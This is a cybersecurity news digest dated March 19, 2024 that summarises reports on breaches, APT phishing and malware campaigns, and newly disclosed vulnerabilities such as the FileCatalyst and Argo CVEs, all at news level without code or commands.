CISO Daily Update - March 19, 2024
NEW DEVELOPMENTS
Fujitsu Found Malware on IT Systems, Confirms Data Breach
Source: Bleeping Computer
Tech giant Fujitsu disclosed a cybersecurity incident involving malware infections on its IT systems, potentially resulting in customer data theft. The company, known for its diverse portfolio and collaboration with the Japanese government, detected the presence of malware on multiple business systems, prompting response actions such as isolation and enhanced monitoring. While investigations are ongoing to determine the extent of the breach and the data compromised, Fujitsu notified the authorities and is preparing notices for any affected customers. This incident follows a previous hack in May 2021, where Fujitsu's ProjectWEB tool was exploited–leading to the unauthorized access and theft of sensitive government data.?
APT28 Hacker Group Targeting Europe, Americas, Asia in Widespread Phishing Scheme
Source: The Hacker News
A Russia-linked threat actor known as APT28 was linked to phishing campaigns targeting government and non-governmental organizations across Europe, the Americas, Asia, and other regions. IBM X-Force reveals the use of lure documents related to finance, critical infrastructure, and cybersecurity to deceive victims. Tactics include leveraging Microsoft Windows protocols and exploiting vulnerabilities in Microsoft Outlook. Recent activities involve targeting Ukrainian and Polish entities with bespoke implants and information stealers. APT28's arsenal includes a variety of malware variants for file exfiltration, command execution, and browser data theft. Evidence suggests that compromised Ubiqui routers may have been used to host command and control servers.?
Hackers Using Sneaky HTML Smuggling to Deliver Malware via Fake Google Sites
Source: The Hacker News
Hackers have launched a sophisticated malware campaign utilizing deceptive Google Sites pages and HTML smuggling to distribute AZORult, a notorious information-stealing malware. The attack involves embedding the malicious payload within a JSON file on an external website to bypass traditional security measures. AZORult is known for its capability to steal sensitive data–including credentials, browser history, and cryptocurrency wallets, and is delivered via rogue Google Docs pages using HTML smuggling. This stealthy technique exploits legitimate HTML5 and JavaScript features to assemble and launch the malware, evading detection by email gateways and anti-malware products. The campaign also employs CAPTCHA barriers and shortcut files masquerading as PDF bank statements to execute PowerShell scripts and deploy the AZORult loader.?
The Aviation and Aerospace Sectors Face Skyrocketing Cyber Threats
Source: Security Affairs
The aviation and aerospace sectors are facing a surge in cyber threats with major ransomware groups and advanced threat actors targeting airports and aviation companies. A prominent ransomware group known as Lockbit 3.0 has executed attacks on notable companies, including Bangkok Airways, E.M.I.T Aviation Consulting, Kuwait Airlines, and Air Albania. Geopolitical tensions, exemplified by the conflict in Ukraine and the Middle East, have exacerbated the risk of destructive cyberattacks on critical infrastructure sectors like aerospace. Given its designation as critical infrastructure, the aviation sector is more visible and vulnerable to cyber threats, attracting advanced persistent threat groups and hacktivist collectives.?
Apex Legends Players Worried About RCE Flaw After ALGS Hacks
Source: Bleeping Computer
The North American finals of the Apex Legends Global Series (ALGS) have been postponed by Electronic Arts due to hackers compromising players mid-match. In Match 3 of the NA finals, one player suddenly displayed a cheat tool, granting an unfair advantage by revealing all players' positions on the map. Despite the intervention of tournament admins, the hacker struck again. The hacks were attributed to hackers who claimed to have exploited a remote code execution (RCE) vulnerability to hijack players' clients. While theories abound regarding the source of the vulnerability, Easy Anti-Cheat has asserted that there is no RCE flaw within their software. The incident marks an unprecedented occurrence in ALGS history, leading to suspending the tournament's matches and raising concerns about the security of esports competitions.
Chinese Earth Krahang Hackers Breach 70 Orgs in 23 Countries
Source: Bleeping Computer
A sophisticated hacking campaign attributed to a Chinese Advanced Persistent Threat (APT) group named 'Earth Krahang' has targeted 70 organizations across 45 countries, focusing on government entities. Trend Micro researchers have been monitoring the activity since early 2022 and have observed the group exploiting vulnerable internet-facing servers and employing spear-phishing emails to deploy custom backdoors for cyberespionage. Earth Krahang leverages compromised government infrastructure to launch attacks on other governments, establish VPN servers on breached systems, and conduct password brute-forcing to gain access to valuable email accounts. The threat actors use open-source tools to scan for specific vulnerabilities and deploy webshells for unauthorized access within victim networks. Spear-phishing emails themed around geopolitical topics are used as initial access vectors, with malicious attachments dropping backdoors onto victims' computers. The group also utilizes compromised email accounts to target colleagues or other governments with spear-phishing emails.
领英推荐
New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics
Source: The Hacker News
Security researchers at Securonix uncovered a sophisticated cyberattack campaign dubbed DEEP#GOSU, attributed to the North Korean state-sponsored group Kimsuky. This campaign utilizes PowerShell and VBScript malware to target Windows systems, particularly in Ukraine, to stealthily collect sensitive information. The malware employed in the campaign exhibits advanced capabilities, including keylogging, clipboard monitoring, dynamic payload execution, data exfiltration, and persistence mechanisms such as RAT software and scheduled tasks. Notably, the attackers leverage legitimate cloud services like Dropbox and Google Docs for command-and-control purposes, allowing them to evade detection and update the malware's functionality seamlessly. The attack begins with malicious email attachments containing rogue shortcut files, which, when opened, execute PowerShell scripts to retrieve and execute additional malicious payloads from Dropbox. These payloads include a .NET assembly file acting as a remote access trojan (TruRat) and a VBScript for further execution of PowerShell scripts via WMI and setting scheduled tasks for persistence. The VBScript also utilizes Google Docs to dynamically retrieve configuration data, enabling the threat actor to modify account information without altering the script.?
VULNERABILITIES TO WATCH
New Attack Shows Risks of Browsers Giving Websites Access to GPU?
Source: Security Week
A team of researchers has unveiled a novel GPU cache side-channel attack conducted entirely within web browsers through the WebGPU API, enabling the exploitation of vulnerabilities in AMD and NVIDIA graphics cards. This attack, requiring only a victim's visit to a malicious website, poses risks of sensitive data theft and covert data exfiltration. While notifications were sent to browser developers and GPU manufacturers, no immediate actions have been announced, with ongoing discussions underway about the necessity of permission pop-ups for GPU access in browsers to mitigate potential risks.
Fortra Patches Critical RCE Vulnerability in FileCatalyst Transfer Tool
Source: The Hacker News
Fortra has patched a significant remote code execution (RCE) vulnerability in its FileCatalyst file transfer service, known as CVE-2024-25153. Unauthenticated attackers might use this security flaw to upload files outside their intended path and execute arbitrary code, including web shells on vulnerable servers. The vulnerability was initially reported on August 9, 2023, and was addressed in FileCatalyst Workflow version 5.1.6 Build 114. Fortra also patched two further security vulnerabilities in FileCatalyst Direct (CVE-2024-25154 and CVE-2024-25155) in January 2024.
Over 50,000 Vulnerabilities Discovered in DoD Systems Through Bug Bounty Program
Source: Infosecurity Magazine
The US Department of Defense (DoD) has successfully identified over 50,000 vulnerabilities in its systems through its vulnerability disclosure program (VDP), managed by the DoD Cyber Crime Center (DC3). Launched in November 2016 following the 'Hack the Pentagon' bug bounty program, DC3's VDP invites ethical hackers to continuously identify and report vulnerabilities within US military IT systems. In 2021, DC3 partnered with the Defense Counterintelligence and Security Agency for a pilot program targeting small to medium Defense Industrial Base (DIBCOs) organizations, resulting in significant savings and recognition with the DoD Chief Information Officer Annual Award. Additionally, the DoD collaborates with platforms like HackerOne, Bugcrowd, and Synack for standalone bug bounty programs covering various departments and assets, ensuring ongoing cybersecurity efforts.
Three New Critical Vulnerabilities Uncovered in Argo
Source: Infosecurity Magazine
KTrust's in-house researchers have identified three critical vulnerabilities within Argo, a widely used GitOps continuous delivery tool in Kubernetes setups. The first vulnerability, CVE-2024-21662, involves overloading the cache system to bypass rate limit and brute force protection mechanisms, leaving the system vulnerable to attacks. CVE-2024-21652 exploits weaknesses to bypass brute force protection, while CVE-2024-21661 allows for DoS attacks due to improper array manipulation in a multi-threaded environment. KTrust reported these vulnerabilities to Argo in September 2023, and Argo is reportedly working on addressing them in a future release. Nadav Aharon-Nov, CTO and co-founder of KTrust, emphasized the importance of promptly addressing such vulnerabilities to prevent potential security breaches. Despite attempts to contact Argo for comment, they have not responded at the time of writing. Security measures to defend Kubernetes environments include implementing robust access controls, regular software updates, network segmentation, and conducting security audits.
SPECIAL REPORTS
Tracking Everything on the Dark Web Is Mission Critical
Source: Darkreading
Monitoring the Dark Web is standard practice to detect potential breaches of sensitive company data. However, finding company information on the Dark Web doesn't necessarily indicate a successful attack; the data could have originated from sources like cloud storage, employee devices, or third-party partners. Reacting hastily to Dark Web discoveries can lead to unnecessary and expensive changes, potentially triggering compliance disclosures and financial penalties based on flawed assumptions. Sensitive data breaches require thorough investigation to determine the extent of the exposure and its origin. Precise coding and labeling enable tracing data back to its source, aiding in identifying vulnerabilities that may require action. For expired secrets, their presence on the Dark Web may not be critical, but active keys represent a serious threat requiring swift and appropriate action. Establishing detailed metadata tracking from the creation of secrets to their movement ensures a proactive approach to breach detection and response.?